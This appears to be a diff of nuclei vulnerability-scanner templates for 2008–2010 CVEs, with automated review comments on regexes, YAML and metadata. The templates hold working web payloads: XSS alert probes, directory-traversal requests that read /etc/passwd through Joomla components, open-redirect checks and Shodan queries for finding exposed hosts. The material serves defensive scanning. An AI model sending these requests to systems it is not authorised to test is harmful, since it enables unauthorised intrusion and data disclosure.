@@ -6,22 +6,33 @@ info: severity: medium description: | Parallels H-Sphere 3.0.0 P9 and 3.1 P1 contains multiple cross-site scripting vulnerabilities in login.php in webshell4. An attacker can inject arbitrary web script or HTML via the err, errorcode, and login parameters, thus allowing theft of cookie-based authentication credentials and launch of other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Apply the latest security patches or upgrade to a newer version of Parallels H-Sphere to mitigate the XSS vulnerability. reference: - http://www.xssing.com/index.php?x=3&y=65 - https://exchange.xforce.ibmcloud.com/vulnerabilities/45254 - https://exchange.xforce.ibmcloud.com/vulnerabilities/45252 - https://nvd.nist.gov/vuln/detail/CVE-2008-6465 + - https://github.com/ARPSyndicate/kenzer-templates classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2008-6465 - cwe-id: CWE-80 + cwe-id: CWE-79 + epss-score: 0.00421 + epss-percentile: 0.73765 + cpe: cpe:2.3:a:parallels:h-sphere:3.0.0:p9:*:*:*:*:*:* metadata: verified: true + max-request: 1 + vendor: parallels + product: h-sphere shodan-query: title:"Parallels H-Sphere tags: cve,cve2008,xss,parallels,h-sphere -requests: +http: - method: GET path: - '{{BaseURL}}/webshell4/login.php?errcode=0&login=\%22%20onfocus=alert(document.domain);%20autofocus%20\%22&err=U' @@ -43,5 +54,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/12/08 +# digest: 490a0046304402200fe7f64211b0ac14e48925d06d09a65070632e86c47843b9217a84320880330d022078feaff899b6d7e68e8cc85f5dbbc923969ec1a18c3259c0bcea48559cd82b1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
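Review bot: The context line `shodan-query: title:"Parallels H-Sphere` in the metadata block this hunk edits is missing its closing quote, so the query will not paste cleanly into Shodan; since the hunk already adds `max-request`, `vendor` and `product` directly around it, this is the moment to fix it to `shodan-query: title:"Parallels H-Sphere"`. The switch from `cwe-id: CWE-80` to `CWE-79` and from CVSS 3.1 to the NVD 2.0 vector is consistent with the severity staying medium. Bear in mind the `# digest:` line added at the end signs the template content, so the quote fix has to go in before re-signing rather than as a later hand edit.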
diff --git a/nuclei-templates/CVE-2008/CVE-2008-6982.yaml b/nuclei-templates/CVE-2008/CVE-2008-6982.yaml index bbec36dfbb..384346aaaf 100644 --- a/nuclei-templates/CVE-2008/CVE-2008-6982.yaml +++ b/nuclei-templates/CVE-2008/CVE-2008-6982.yaml @@ -3,23 +3,34 @@ id: CVE-2008-6982 info: name: Devalcms 1.4a - Cross-Site Scripting author: arafatansari - severity: high + severity: medium description: | Devalcms 1.4a contains a cross-site scripting vulnerability in the currentpath parameter of the index.php file. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/6369 - http://sourceforge.net/projects/devalcms/files/devalcms/devalcms-1.4b/devalcms-1.4b.zip/download - https://nvd.nist.gov/vuln/detail/CVE-2008-6982 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/44940 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2008-6982 cwe-id: CWE-79 + epss-score: 0.0038 + epss-percentile: 0.70097 + cpe: cpe:2.3:a:devalcms:devalcms:1.4a:*:*:*:*:*:*:* metadata: - verified: "true" + verified: true + max-request: 1 + vendor: devalcms + product: devalcms tags: cve,cve2008,devalcms,xss,cms,edb -requests: +http: - method: GET path: - '{{BaseURL}}/index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' @@ -39,5 +50,4 @@ requests: - type: status status: - 500 - -# Enhanced by md on 2022/09/20 +# digest: 4a0a00473045022100930ae1e3a335eff7b78c478fd3c7f1177b65130a6d6b2b00ff6507a2c29d87900220537ba82e9274860321609d107916524e805cd669e6949ae5fce2998f92e135f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2008/CVE-2008-7269.yaml b/nuclei-templates/CVE-2008/CVE-2008-7269.yaml index b6eca282e8..8eaf2fb274 100644 --- a/nuclei-templates/CVE-2008/CVE-2008-7269.yaml +++ b/nuclei-templates/CVE-2008/CVE-2008-7269.yaml @@ -6,24 +6,27 @@ info: severity: medium description: | Open redirect vulnerability in api.php in SiteEngine 5.x allows user-assisted remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the forward parameter in a logout action. + remediation: | + Apply the latest patches or updates provided by the vendor to fix the open redirect vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2008-7269 - https://www.exploit-db.com/exploits/6823 + - https://github.com/tr3ss/newclei classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:P cvss-score: 5.8 cve-id: CVE-2008-7269 cwe-id: CWE-20 - epss-score: 0.01358 + epss-score: 0.01425 + epss-percentile: 0.86241 cpe: cpe:2.3:a:boka:siteengine:5.0:*:*:*:*:*:*:* - epss-percentile: 0.84524 metadata: - max-request: 1 - shodan-query: html:"SiteEngine" verified: "true" + max-request: 1 vendor: boka product: siteengine - tags: cve,cve2008,redirect,siteengine + shodan-query: html:"SiteEngine" + tags: cve,cve2008,redirect,siteengine,boka http: - method: GET @@ -35,3 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' +# digest: 4a0a00473045022100ffdf11249d57dd33b3a45982e01655bacfcd643a4c57e97aa5f891243557c3b202205fd36fccfd2f9c9afdec7d8b8b4463ac9a1d07a52b558de7a68f374cbc5bc3ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2008/CVE-2008-6172.yaml b/nuclei-templates/CVE-2008/cve-2008-6172.yaml similarity index 100% rename from nuclei-templates/CVE-2008/CVE-2008-6172.yaml rename to nuclei-templates/CVE-2008/cve-2008-6172.yaml 
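Review bot: The context regex `(?:http?://|//)` in the CVE-2008-7269 matcher applies the `?` to the `p`, so it matches `http://` and `htt://` but never `https://`; a Location header redirecting to `https://…interact.sh` would be missed. The same pattern appears in the CVE-2009-0347 hunk in this commit, while CVE-2008-1547 gets it right, so both should read `'(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'`. Whether this currently causes false negatives depends on the injected target in the request path, which is outside the hunk. The hunk also leaves `verified: "true"` as a quoted string while the CVE-2008-6982 hunk in the same commit normalizes it to the boolean `verified: true`; one form should be used throughout.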
diff --git a/nuclei-templates/CVE-2008/CVE-2008-6222.yaml b/nuclei-templates/CVE-2008/cve-2008-6222.yaml similarity index 100% rename from nuclei-templates/CVE-2008/CVE-2008-6222.yaml rename to nuclei-templates/CVE-2008/cve-2008-6222.yaml diff --git a/nuclei-templates/CVE-2009/CVE-2009-0347.yaml b/nuclei-templates/CVE-2009/CVE-2009-0347.yaml index 3dc5f17842..550657fbfb 100644 --- a/nuclei-templates/CVE-2009/CVE-2009-0347.yaml +++ b/nuclei-templates/CVE-2009/CVE-2009-0347.yaml @@ -21,8 +21,8 @@ info: cvss-score: 5.8 cve-id: CVE-2009-0347 cwe-id: CWE-59 - epss-score: 0.09851 - epss-percentile: 0.94077 + epss-score: 0.10607 + epss-percentile: 0.94532 cpe: cpe:2.3:a:autonomy:ultraseek:_nil_:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,3 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' +# digest: 4b0a00483046022100cf3670c23a13df5e6953abeb0b31099f649dedb0d0f8d27279f83729a6dfa817022100892363b09ea6413d98fec323ec8d65cc59e55bfc00166958fbaff5ac83e0f192:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2009/cve-2009-1496.yaml b/nuclei-templates/CVE-2009/CVE-2009-1496.yaml similarity index 100% rename from nuclei-templates/CVE-2009/cve-2009-1496.yaml rename to nuclei-templates/CVE-2009/CVE-2009-1496.yaml diff --git a/nuclei-templates/CVE-2009/CVE-2009-1872.yaml b/nuclei-templates/CVE-2009/CVE-2009-1872.yaml index 38cdeae599..2020a26398 100644 --- a/nuclei-templates/CVE-2009/CVE-2009-1872.yaml +++ b/nuclei-templates/CVE-2009/CVE-2009-1872.yaml 
@@ -6,15 +6,8 @@ info: severity: medium description: Multiple cross-site scripting (XSS) vulnerabilities in Adobe ColdFusion Server 8.0.1, 8, and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm. reference: - - https://web.archive.org/web/20201208121904/https://www.securityfocus.com/archive/1/505803/100/0/threaded + - https://www.securityfocus.com/archive/1/505803/100/0/threaded - https://www.tenable.com/cve/CVE-2009-1872 - - http://www.adobe.com/support/security/bulletins/apsb09-12.html - - http://www.dsecrg.com/pages/vul/show.php?id=122 - classification: - cve-id: CVE-2009-1872 - metadata: - shodan-query: http.component:"Adobe ColdFusion" - verified: "true" tags: cve,cve2009,adobe,xss,coldfusion requests: diff --git a/nuclei-templates/CVE-2009/cve-2009-2100.yaml b/nuclei-templates/CVE-2009/CVE-2009-2100.yaml similarity index 100% rename from nuclei-templates/CVE-2009/cve-2009-2100.yaml rename to nuclei-templates/CVE-2009/CVE-2009-2100.yaml diff --git a/nuclei-templates/CVE-2009/cve-2009-3318.yaml b/nuclei-templates/CVE-2009/CVE-2009-3318.yaml similarity index 100% rename from nuclei-templates/CVE-2009/cve-2009-3318.yaml rename to nuclei-templates/CVE-2009/CVE-2009-3318.yaml diff --git a/nuclei-templates/CVE-2009/CVE-2009-4202.yaml b/nuclei-templates/CVE-2009/CVE-2009-4202.yaml index 29b94221e9..8f872ac535 100644 --- a/nuclei-templates/CVE-2009/CVE-2009-4202.yaml +++ b/nuclei-templates/CVE-2009/CVE-2009-4202.yaml 
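Review bot: The CVE-2009-1872 hunk removes the Adobe bulletin `http://www.adobe.com/support/security/bulletins/apsb09-12.html`, which is the vendor's own advisory for this ColdFusion issue, along with the `classification:` block and the `shodan-query` / `verified` metadata that the rest of this commit is adding to other templates. It also replaces the web.archive.org snapshot of the securityfocus post with the live URL; the archived link was presumably chosen because the live page is not dependable, so the swap is likely a regression. I would keep `- http://www.adobe.com/support/security/bulletins/apsb09-12.html` and `classification:` with `cve-id: CVE-2009-1872`, and retain the archived URL. The `requests:` block begins at the end of this hunk and continues outside it.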
@@ -1,28 +1,27 @@ id: CVE-2009-4202 + info: - name: Joomla! Omilen Photo Gallery 0.5b - Local File Inclusion + name: Joomla! Component Omilen Photo Gallery 0.5b - Local File Inclusion author: daffainfo severity: high - description: Joomla! Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php. + description: Directory traversal vulnerability in the Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/8870 - - http://www.vupen.com/english/advisories/2009/1494 - - https://nvd.nist.gov/vuln/detail/CVE-2009-4202 - - http://web.archive.org/web/20210121191031/https://www.securityfocus.com/bid/35201/ - classification: - cve-id: CVE-2009-4202 + - https://www.cvedetails.com/cve/CVE-2009-4202 tags: cve,cve2009,joomla,lfi,photo + requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - 200 - -# Enhanced by mp on 2022/06/08
diff --git a/nuclei-templates/CVE-2009/CVE-2009-2015.yaml b/nuclei-templates/CVE-2009/cve-2009-2015.yaml
similarity index 100%
rename from nuclei-templates/CVE-2009/CVE-2009-2015.yaml
rename to nuclei-templates/CVE-2009/cve-2009-2015.yaml
diff --git a/nuclei-templates/CVE-2009/CVE-2009-4679.yaml b/nuclei-templates/CVE-2009/cve-2009-4679.yaml
similarity index 100%
rename from nuclei-templates/CVE-2009/CVE-2009-4679.yaml
rename to nuclei-templates/CVE-2009/cve-2009-4679.yaml
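Review bot: The regex matcher on the new side is loosened from `root:.*:0:0:` to `root:.*:0:0`: the dropped trailing colon no longer requires the gid field to be terminated, so the pattern also accepts values such as `:0:01` and deviates from the passwd-line form still used by the templates this commit deletes; keep `- "root:.*:0:0:"` unless the change is deliberate. The same edit appears in the CVE-2010-1304, CVE-2010-1461, CVE-2010-1470, CVE-2010-1540, CVE-2010-1653, CVE-2010-1952, CVE-2010-2034, CVE-2010-2037, CVE-2010-2045 and CVE-2010-2507 hunks. This hunk also removes the `classification:`/`cve-id:` block and the nvd.nist.gov reference, leaving only cvedetails.com as the CVE source, and several of these rewritten templates (CVE-2010-1540, CVE-2010-1653, CVE-2010-2045, CVE-2010-2507) additionally lose their trailing newline, as the `\ No newline at end of file` markers show.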
diff --git a/nuclei-templates/CVE-2009/CVE-2009-5020.yaml b/nuclei-templates/CVE-2009/cve-2009-5020.yaml
similarity index 100%
rename from nuclei-templates/CVE-2009/CVE-2009-5020.yaml
rename to nuclei-templates/CVE-2009/cve-2009-5020.yaml
diff --git a/nuclei-templates/CVE-2010/CVE-2010-0759.yaml b/nuclei-templates/CVE-2010/CVE-2010-0759.yaml
deleted file mode 100644
index 326a4a8151..0000000000
--- a/nuclei-templates/CVE-2010/CVE-2010-0759.yaml
+++ /dev/null
@@ -1,28 +0,0 @@ -id: CVE-2010-0759 -info: - name: Joomla! Plugin Core Design Scriptegrator - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter. - reference: - - https://www.exploit-db.com/exploits/11498 - - https://www.cvedetails.com/cve/CVE-2010-0759 - - http://secunia.com/advisories/38637 - - http://www.securityfocus.com/bid/38296 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-0759 - tags: cve,cve2010,joomla,lfi,plugin -requests: - - method: GET - path: - - "{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/13
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1081.yaml b/nuclei-templates/CVE-2010/CVE-2010-1081.yaml
deleted file mode 100644
index df9050f620..0000000000
--- a/nuclei-templates/CVE-2010/CVE-2010-1081.yaml
+++ /dev/null
@@ -1,26 +0,0 @@ -id: CVE-2010-1081 -info: - name: Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - remediation: Apply all relevant security patches and product upgrades. - reference: - - https://www.exploit-db.com/exploits/11511 - - https://www.cvedetails.com/cve/CVE-2010-1081 - tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-1081 -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/13
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1302.yaml b/nuclei-templates/CVE-2010/CVE-2010-1302.yaml
deleted file mode 100644
index 061126f3fb..0000000000
--- a/nuclei-templates/CVE-2010/CVE-2010-1302.yaml
+++ /dev/null
@@ -1,26 +0,0 @@ -id: CVE-2010-1302 -info: - name: Joomla! Component DW Graph - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. - remediation: Upgrade to a supported version. - reference: - - https://www.exploit-db.com/exploits/11978 - - https://www.cvedetails.com/cve/CVE-2010-1302 - tags: cve,cve2010,joomla,lfi,graph - classification: - cve-id: CVE-2010-1302 -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/14
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1304.yaml b/nuclei-templates/CVE-2010/CVE-2010-1304.yaml
index 0b865d1e8d..bacd107b78 100644
--- a/nuclei-templates/CVE-2010/CVE-2010-1304.yaml
+++ b/nuclei-templates/CVE-2010/CVE-2010-1304.yaml
@@ -1,28 +1,27 @@ id: CVE-2010-1304 + info: name: Joomla! Component User Status - Local File Inclusion author: daffainfo severity: high - description: A directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: Directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11998 - https://www.cvedetails.com/cve/CVE-2010-1304 - - http://web.archive.org/web/20210518080735/https://www.securityfocus.com/bid/39174 - - http://www.securityfocus.com/bid/39174 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1304 tags: cve,cve2010,joomla,lfi,status + requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - 200 -# Enhanced by mp on 2022/02/14
diff --git a/nuclei-templates/CVE-2010/cve-2010-1305.yaml b/nuclei-templates/CVE-2010/CVE-2010-1305.yaml
similarity index 100%
rename from nuclei-templates/CVE-2010/cve-2010-1305.yaml
rename to nuclei-templates/CVE-2010/CVE-2010-1305.yaml
diff --git a/nuclei-templates/CVE-2010/cve-2010-1306.yaml b/nuclei-templates/CVE-2010/CVE-2010-1306.yaml
similarity index 100%
rename from nuclei-templates/CVE-2010/cve-2010-1306.yaml
rename to nuclei-templates/CVE-2010/CVE-2010-1306.yaml
diff --git a/nuclei-templates/CVE-2010/cve-2010-1313.yaml b/nuclei-templates/CVE-2010/CVE-2010-1313.yaml
similarity index 100%
rename from nuclei-templates/CVE-2010/cve-2010-1313.yaml
rename to nuclei-templates/CVE-2010/CVE-2010-1313.yaml
diff --git a/nuclei-templates/CVE-2010/cve-2010-1314.yaml b/nuclei-templates/CVE-2010/CVE-2010-1314.yaml
similarity index 100%
rename from nuclei-templates/CVE-2010/cve-2010-1314.yaml
rename to nuclei-templates/CVE-2010/CVE-2010-1314.yaml
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1429.yaml b/nuclei-templates/CVE-2010/CVE-2010-1429.yaml
index 63b1ca0f85..29f5fdfb93 100644
--- a/nuclei-templates/CVE-2010/CVE-2010-1429.yaml
+++ b/nuclei-templates/CVE-2010/CVE-2010-1429.yaml
@@ -6,21 +6,33 @@ info: severity: medium description: | Red Hat JBoss Enterprise Application Platform 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 is susceptible to sensitive information disclosure. A remote attacker can obtain sensitive information about "deployed web contexts" via a request to the status servlet, as demonstrated by a full=true query string. NOTE: this issue exists because of a CVE-2008-3273 regression. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to further attacks. + remediation: | + Apply the necessary patches or updates provided by Red Hat to fix the vulnerability. reference: - https://rhn.redhat.com/errata/RHSA-2010-0377.html - https://nvd.nist.gov/vuln/detail/CVE-2010-1429 - https://nvd.nist.gov/vuln/detail/CVE-2008-3273 + - http://marc.info/?l=bugtraq&m=132698550418872&w=2 + - http://securitytracker.com/id?1023918 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2010-1429 - cwe-id: CWE-200 + cwe-id: CWE-264 + epss-score: 0.00573 + epss-percentile: 0.77469 + cpe: cpe:2.3:a:redhat:jboss_enterprise_application_platform:*:cp08:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: redhat + product: jboss_enterprise_application_platform shodan-query: title:"JBoss" - verified: "true" - tags: cve,cve2010,jboss,eap,tomcat,exposure + tags: cve2010,cve,jboss,eap,tomcat,exposure,redhat -requests: +http: - method: GET path: - "{{BaseURL}}/status?full=true"
@@ -37,5 +49,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/01/30 +# digest: 4a0a00473045022100bdd3f2bcbf92f7f9b377bef80acf174a216abb0cb2acf3477efe856c2083c07702203e9b25701cd0278ddb795ca72e40c2c00dcb6e3924b009706b93a3f0d6416eac:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
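Review bot: The classification on the new side replaces the CVSS 3.0 vector (score 5.3) with `cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N` and `cvss-score: 5`, and changes `cwe-id: CWE-200` to `cwe-id: CWE-264`, while the description still characterizes the issue as sensitive information disclosure; moving to the older scoring standard and a broader weakness class reads as a regression and should be confirmed against the referenced NVD entry before merging. The added `cpe` carries `cp08` in its update field although the description states 4.3 is fixed in 4.3.0.CP08, so that value may conflict with the affected range and deserves the same check. The new `impact:` and `remediation:` texts are generic; stating that the status servlet discloses deployed web contexts, as the description already says, would make `impact` specific to this template.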
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1461.yaml b/nuclei-templates/CVE-2010/CVE-2010-1461.yaml
index 7a487e0507..1e3d3663a4 100644
--- a/nuclei-templates/CVE-2010/CVE-2010-1461.yaml
+++ b/nuclei-templates/CVE-2010/CVE-2010-1461.yaml
@@ -1,28 +1,27 @@ id: CVE-2010-1461 + info: name: Joomla! Component Photo Battle 1.0.1 - Local File Inclusion author: daffainfo severity: high - description: A directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php. - reference: + description: Directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php. + reference: | - https://www.exploit-db.com/exploits/12232 - https://www.cvedetails.com/cve/CVE-2010-1461 - - http://web.archive.org/web/20210518110953/https://www.securityfocus.com/bid/39504 - - http://www.securityfocus.com/bid/39504 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1461 tags: cve,cve2010,joomla,lfi,photo + requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - 200 -# Enhanced by mp on 2022/02/14
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1470.yaml b/nuclei-templates/CVE-2010/CVE-2010-1470.yaml
index f5117822e8..bcb3e84703 100644
--- a/nuclei-templates/CVE-2010/CVE-2010-1470.yaml
+++ b/nuclei-templates/CVE-2010/CVE-2010-1470.yaml
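Review bot: `reference: |` on the new side appears to turn the reference entries into a YAML literal block scalar: the `- https://www.exploit-db.com/exploits/12232` and `- https://www.cvedetails.com/cve/CVE-2010-1461` context lines indented beneath it become one multi-line string rather than a sequence of URLs. Presumably unintended; keep `reference:` as the old side had it. The CVE-2010-2507 hunk makes the same change, and CVE-2010-1540 already carries `reference: |` in its context lines, so that template likely has the same problem. This hunk also drops the `remediation:` line and the `classification:`/`cve-id:` block without a replacement.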
@@ -4,27 +4,24 @@ info: name: Joomla! Component Web TV 1.0 - Local File Inclusion author: daffainfo severity: high - description: A directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and have possibly other unspecified impacts via a .. (dot dot) in the controller parameter to index.php. + description: Directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12166 - https://www.cvedetails.com/cve/CVE-2010-1470 - - http://web.archive.org/web/20140723205548/http://secunia.com/advisories/39405/ - - http://www.exploit-db.com/exploits/12166 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1470 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - 200 -# Enhanced by mp on 2022/02/14
diff --git a/nuclei-templates/CVE-2010/cve-2010-1475.yaml b/nuclei-templates/CVE-2010/CVE-2010-1475.yaml
similarity index 100%
rename from nuclei-templates/CVE-2010/cve-2010-1475.yaml
rename to nuclei-templates/CVE-2010/CVE-2010-1475.yaml
diff --git a/nuclei-templates/CVE-2010/cve-2010-1495.yaml b/nuclei-templates/CVE-2010/CVE-2010-1495.yaml
similarity index 100%
rename from nuclei-templates/CVE-2010/cve-2010-1495.yaml
rename to nuclei-templates/CVE-2010/CVE-2010-1495.yaml
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1532.yaml b/nuclei-templates/CVE-2010/CVE-2010-1532.yaml
deleted file mode 100644
index 1dd4120e53..0000000000
--- a/nuclei-templates/CVE-2010/CVE-2010-1532.yaml
+++ /dev/null
@@ -1,28 +0,0 @@ -id: CVE-2010-1532 -info: - name: Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12118 - - https://www.cvedetails.com/cve/CVE-2010-1532 - - http://packetstormsecurity.org/1004-exploits/joomlapowermail-lfi.txt - - http://www.securityfocus.com/bid/39348 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1532 - tags: cve,cve2010,joomla,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/15
diff --git a/nuclei-templates/CVE-2010/cve-2010-1535.yaml b/nuclei-templates/CVE-2010/CVE-2010-1535.yaml
similarity index 100%
rename from nuclei-templates/CVE-2010/cve-2010-1535.yaml
rename to nuclei-templates/CVE-2010/CVE-2010-1535.yaml
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1540.yaml b/nuclei-templates/CVE-2010/CVE-2010-1540.yaml
index 7871928c1d..b0afe05f6e 100644
--- a/nuclei-templates/CVE-2010/CVE-2010-1540.yaml
+++ b/nuclei-templates/CVE-2010/CVE-2010-1540.yaml
@@ -4,25 +4,24 @@ info: name: Joomla! Component com_blog - Directory Traversal author: daffainfo severity: high - description: A directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter. + description: Directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter. reference: | - https://www.exploit-db.com/exploits/11625 - https://www.cvedetails.com/cve/CVE-2010-1540 tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-1540 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - - 200 - -# Enhanced by mp on 2022/03/06 + - 200
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1586.yaml b/nuclei-templates/CVE-2010/CVE-2010-1586.yaml
index 33a06a0e5a..e9c3e2cc65 100644
--- a/nuclei-templates/CVE-2010/CVE-2010-1586.yaml
+++ b/nuclei-templates/CVE-2010/CVE-2010-1586.yaml
@@ -6,6 +6,8 @@ info: severity: medium description: | Open redirect vulnerability in red2301.html in HP System Management Homepage (SMH) 2.x.x.x allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the RedirectUrl parameter. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks or the download of malware. remediation: | Apply the latest patches or updates provided by HP to fix the open redirect vulnerability. reference:
